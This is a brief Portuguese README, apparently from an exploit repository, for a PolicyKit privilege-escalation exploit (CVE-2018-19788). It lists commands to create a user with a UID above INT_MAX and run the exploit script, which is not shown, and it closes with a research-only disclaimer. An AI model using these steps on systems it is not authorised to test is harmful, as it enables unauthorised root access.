
Exploit ridiculamente fácil para CVE-2018-19788
Exploit bobo e fácil para CVE-2018-19788
Para usar isto, você deve criar um usuário com UID > INT_MAX no Policy Kit ou já ter um usuário de baixo privilégio com o UID mencionado.
O UID pode ser especificado na criação do usuário da seguinte forma, e usado antes da execução do script:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
Por favor, note que isso é meramente para pesquisa e você é responsável pelo seu próprio uso de qualquer código encontrado neste repositório ou em qualquer outro, como o bom senso determina.